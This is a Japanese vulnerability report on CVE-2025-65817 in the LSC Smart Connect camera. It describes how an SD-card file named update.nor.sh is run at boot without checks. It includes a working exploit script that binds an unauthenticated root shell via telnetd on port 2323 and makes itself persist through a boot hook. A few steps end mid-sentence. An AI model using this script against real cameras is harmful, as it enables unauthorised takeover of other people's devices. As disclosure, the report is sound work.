
こちらがCVE-2025-65817です
| フィールド | 値 |
|---|---|
| タイトル | 脆弱性レポート: LSCスマートコネクトカメラ |
| 日付 | 2024-02-15 |
| 説明 | SDカードの更新フックを悪用して、LSCスマートコネクトカメラ上でリモートシェルを起動する。 |
| タグ | iot, vulnerability, cve |
| ファームウェア | 1.14.13 |
発見された脆弱性は、start_app.sh の更新システムを悪用するものであり、より正確にはSDカードのマウントと update.nor.sh ファイルを介して悪用されます。
# routines of sd-card
# /mnt is for backword compatible
SDC_DIR=/mnt
SDC_HOOK=$SDC_DIR/update.nor.sh
SDC_FLAG_DEBUG=$SDC_DIR/__ipc_debug.ini
TMP_HOOK=/tmp/update.nor.sh
SENSOR_ISP_HOOK=$SDC_DIR/ISP/*t23.bin
# debug core-dump
WHERE_COREDMP="/mnt/sdc/coredmp"
WHERE_EXEC="/usr/local/bin/doraemon"
local/sbin/start_app.sh:50–99 のセクションは、SDカード上にある update.nor.sh という名前のファイルを盲目的に信頼します。起動プロセス中、スクリプトは:
update.nor.sh を /tmp/update.nor.sh にコピーし、起動シーケンスの後半(local/sbin/start_app.sh:108–129)では、コピーされたファイルは:
この実行はメインの ipc_service が開始する前に行われるため、スクリプトはネットワークユーティリティ、ウォッチドッグ機能、アップグレードヘルパーがすでに利用可能な最高権限環境で実行されます。
このエクスプロイトは、カメラに存在するtelnetdを介してシェルを作成し、ポートを開くというものです:
/bin # busybox --list
[...]
sh
sleep
swapoff
syslogd
tail
tar
tcpsvd
telnetd
[...]
SDカードに .sh スクリプトを書き込み、update.nor.sh という名前を付けるだけです。
私が選択したエクスプロイトは次のとおりです:
#!/bin/sh
telnetd -l /bin/sh -p 2323 &
echo "Telnet start by update.nor.sh" > /tmp/exploit_success
cp /mnt/update.nor.sh /mnt/config/hook-boot.sh
date > /tmp/exploit_time
ポートが開いていることを確認します。

telnetで接続します:
